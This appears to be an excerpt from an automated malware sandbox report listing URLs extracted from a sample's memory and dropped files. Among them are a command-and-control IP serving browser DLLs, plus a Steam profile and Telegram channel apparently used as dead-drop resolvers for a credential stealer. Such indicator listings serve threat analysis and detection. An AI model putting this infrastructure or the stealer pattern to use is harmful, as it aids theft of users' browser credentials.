Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: mozglue[1].dll.2.dr, mozglue.dll.2.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000002.00000002.2056729974.0000000013ECB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.2.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199677575543[1].htm.2.dr	String found in binary or memory: https://95.217.246.168
Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001601000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/
Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001601000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/6.
Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/freebl3.dll
Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/mozglue.dll
Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/msvcp140.dll(
Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/msvcp140.dllR
Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001601000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/nss3.dll
Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/softokn3.dll
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/sqln.dll
Source: RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/sqln.dlluZqb.
Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/vcruntime140.dll
Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/vcruntime140.dllF
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168FIE
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168KJE
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168ebd8f18e6nt-Disposition:
Source: BFIDGHDB.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 76561199677575543[1].htm.2.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: BFIDGHDB.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BFIDGHDB.2.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BFIDGHDB.2.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6jg&a
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=c4UneKQJ
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=EL8P
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=vQePc_kMURDk&l=e
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: BFIDGHDB.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BFIDGHDB.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BFIDGHDB.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: https://mozilla.org0/
Source: RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: 76561199677575543[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199677575543[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199677575543
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, file.exe, 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543
Source: RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543#
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543/badges
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543/inventory/
Source: file.exe, 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543Mozilla/5.0
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199677575543[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199677575543[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp, ECBAEBGH.2.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: ECBAEBGH.2.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp, ECBAEBGH.2.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: ECBAEBGH.2.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: file.exe, file.exe, 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/snsb82
Source: file.exe, 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/snsb82At
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: BFIDGHDB.2.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BFIDGHDB.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
